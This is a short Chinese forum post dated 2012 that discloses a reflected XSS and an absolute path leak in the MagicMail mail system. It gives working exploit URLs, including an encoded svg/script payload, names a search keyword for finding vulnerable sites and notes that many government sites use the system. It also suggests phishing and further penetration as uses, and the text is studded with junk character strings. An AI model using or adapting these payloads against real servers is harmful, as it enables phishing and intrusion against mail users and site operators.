今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
" c/ o( S$ y5 r9 R4 Y: e4 ^
% F$ {" R, o; p7 W ' a/ n( z% o3 s
包含 一个反射性XSS 以及 绝对路径泄漏
$ }1 L% \- c$ f* v看了看 貌似全部是linux的。
* O( W( T. c1 j" m
& N" A, d! w& d h- @, O% ]关键字:迈捷邮件系统 by MagicMail$ q" h) q8 _8 l
; V' \; l' Y- ?& c9 g/ n可以看到很多政府网站都用这个邮件系统
2 U% t5 a# R1 T
6 F7 W* W/ m* l8 ]; |: u绝对路径 http://madman.in/index.php?login_type=declare&language=
' f5 j6 }+ k& ^3 Y) y2 J( D/ M {/ a4 p/ H. D; U, o( _ |" X3 O
9 h- u, c' @3 N* K( m
8 X) V8 v% `2 E" t0 {
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E9 o4 r2 T3 c( G- S
0 j$ f6 G8 ?/ V: P
1 p8 F) }( N0 a! |8 t5 H
, [1 ?. @" ]# V/ M7 M5 p虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等! ?2 o8 ]# m" w2 X5 o/ ]
6 O {. l: o6 H5 G6 m. M
修复方案:看官方补丁吧。
. M U2 s$ l, x4 E" ]/ E/ k |
发表于 2012-11-9 20:38:41
收藏
支持
反对